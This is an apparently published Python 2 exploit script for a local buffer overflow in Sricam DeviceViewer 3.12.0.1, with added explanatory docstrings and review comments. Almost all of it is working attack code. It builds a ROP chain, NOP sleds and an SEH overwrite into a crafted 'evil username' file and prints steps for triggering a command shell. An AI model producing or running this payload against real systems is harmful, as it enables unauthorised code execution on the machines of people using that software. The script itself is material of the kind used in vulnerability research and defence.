from struct import pack, unpack
def create_rop_chain():
    """Return the hard-coded ROP chain as one packed string.

    Each entry in ``rops`` is emitted as a 32-bit little-endian value
    (``pack('<I', ...)``), so the result is ``4 * len(rops)`` bytes.  The
    addresses are literal constants; nothing on this page says which module
    they belong to or what each gadget does, so they are left uncommented.

    Returns:
        The concatenated packed values.  ``''.join`` over ``pack`` output only
        works on Python 2, where ``pack`` returns ``str``; on Python 3 ``pack``
        returns ``bytes`` and this join raises ``TypeError``.
    """
    # Order is significant: the chain is consumed sequentially as return
    # addresses, so the list must not be reordered or deduplicated.
    rops = [
        0x6a1142aa,
        0x6a569810,
        0x6ae9c126,
        0x6a5dac8a,
        0xff9b929d,
        0x6a2420e8,
        0x6994766b,
        # 0x6a2420ea is repeated back-to-back many times; the repetition is
        # part of the chain layout and must be kept as written.
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a18e062,
        0x6a2420ea,
        0x6a45e446,
        0x6a29d716,
        0x6a569810,
        0x6a36264a,
        0x6a5dac8a,
        0x76e33231,
        0x6a150411,
        0x6a5dac8a,
        0xffffffff,
        0x6a2420e8,
        0x6a5eb992,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
        0x6a2420ea,
    ]
    # '<I' = little-endian unsigned 32-bit; every value above must fit in
    # 32 bits or pack() raises struct.error.
    return ''.join(pack('<I', _) for _ in rops)
def nops(length):
    """Return a string of ``length`` NOP bytes (``\\x90``).

    Used as filler so that the fixed offsets in the payload layout line up.
    A non-positive ``length`` yields the empty string.

    Args:
        length: Number of filler bytes to produce.

    Returns:
        A ``str`` consisting of ``length`` copies of ``"\\x90"``.
    """
    nop = "\x90"
    return "".join(nop for _ in range(length))
rop_chain = create_rop_chain()
# Total payload size; the tail is padded with NOPs up to this length.
maxlen = 5000
# Value written over the SEH handler slot (32-bit little-endian).
seh = pack("<I", 0x6a443e58)
# Next-SEH slot is filled with 4 NOP bytes.
nseh = nops(4)
# Payload layout, in order:
#   8 NOPs | ROP chain | NOP padding to 360 bytes total | 20 NOPs
#   | nseh (4 bytes) | seh (4 bytes) | 300 NOPs
# The "360 - len(rop_chain) - 8" term pins the ROP chain inside a fixed
# 360-byte region; if the chain ever exceeds 352 bytes this goes negative and
# the later offsets silently shift.
payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300)
# Pad the remainder up to maxlen.  If len(payload) > maxlen, sec is negative
# and nops() returns "", so the payload is simply not truncated.
sec = maxlen - len(payload)
payload += nops(sec)
print("Exploit Length: " + str(len(payload)))
try:
    fname = "exprop.txt"
    # NOTE(review): opened in text mode "w" without a `with` block; the
    # str-based payload and the pack()/str concatenation above only work on
    # Python 2 (Python 3 would need bytes and mode "wb").
    exploit = open(fname,"w")
    print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit")
    print("Author: Alessandro Magnosi\n")
    print("[*] Creating evil username")
    exploit.write(payload)
    exploit.close()
    print("[+] Username file created\n")
    print("[i] Now go to 'User Management' and try to add a user with user=<filecontent>")
    print("[+] A command shell will open")
# NOTE(review): bare `except:` swallows every error (including KeyboardInterrupt
# and the TypeError this raises on Python 3) and reports only a generic
# message; catching OSError/IOError and printing the exception would make
# failures diagnosable.
except:
    print("[!] Error creating the file")